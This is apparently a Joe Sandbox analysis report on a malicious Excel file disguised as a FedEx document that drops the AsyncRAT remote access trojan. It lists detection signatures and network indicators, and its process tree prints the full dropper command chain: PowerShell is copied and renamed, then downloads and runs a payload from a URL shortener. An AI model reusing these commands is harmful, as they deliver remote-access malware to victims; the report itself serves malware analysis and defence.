Play interactive tour

Edit tour

Analysis Report 1099008FEDEX_090887766.xls

Overview

General Information

Sample Name:	1099008FEDEX_090887766.xls
Analysis ID:	320331
MD5:	069451376c805d4b4d21fdc34a5e58ba
SHA1:	5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256:	dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
Tags:	AsyncRATRATxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0 AsyncRAT

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected AsyncRAT

Binary contains a suspicious time stamp

Connects to a URL shortener service

Document exploit detected (process start blacklist hit)

Drops PE files to the document folder of the user

Found Excel 4.0 Macro with suspicious formulas

Obfuscated command line found

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

cmd.exe (PID: 7120 cmdline: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Robocopy.exe (PID: 5776 cmdline: robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z MD5: BB8F54AE10FDA174289A4A495809EB69)

cmd.exe (PID: 7140 cmdline: cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5568 cmdline: timeout /t 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cmd.exe (PID: 7156 cmdline: cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4880 cmdline: cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

o.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)

cmd.exe (PID: 1708 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

o.exe (PID: 5728 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

cmd.exe (PID: 6260 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

o.exe (PID: 1560 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: DBA3E6449E97D4E3DF64527EF7012A10)

vc.exe (PID: 4896 cmdline: C:\Users\user\AppData\Roaming\vc.exe MD5: BB7C0DFD8ECC7EEBCE937A232608695F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
1099008FEDEX_090887766.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x10bc2:$s1: Excel 0x32b0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source	Rule	Description	Author	Strings
00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: vc.exe PID: 4896	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6844, ProcessCommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, ProcessId: 7120

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 1099008FEDEX_090887766.xls

ReversingLabs: Detection: 14%

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Source: global traffic

DNS query: name: tinyurl.com

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443

Networking:

Connects to a URL shortener service

Show sources

Source: unknown	DNS query: name: tinyurl.com
Source: unknown	DNS query: name: tinyurl.com

Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 104.20.138.65 104.20.138.65

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

DNS traffic detected: queries for: tinyurl.com

Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: o.exe, 00000011.00000003.407523508.0000000007AEE000.00000004.00000001.sdmp, vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0r
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0
Source: o.exe, 00000011.00000002.413694833.00000000008C5000.00000004.00000020.sdmp, vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngd
Source: o.exe, 0000000E.00000002.394765913.00000000050D1000.00000004.00000001.sdmp, o.exe, 00000010.00000002.396533915.0000000005451000.00000004.00000001.sdmp, o.exe, 00000011.00000002.421442532.00000000046D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: vc.exe.14.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: o.exe, 00000011.00000003.405026738.0000000008D3B000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.co.
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.office.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://augloop.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393$
Source: o.exe, 0000000E.00000002.396972338.0000000005536000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/7706291313930
Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393171507/778732067705454592/ees.exe
Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com4
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.entity.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cortana.ai
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cr.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://directory.services.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pesterd
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.windows.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://lifecycle.office.com
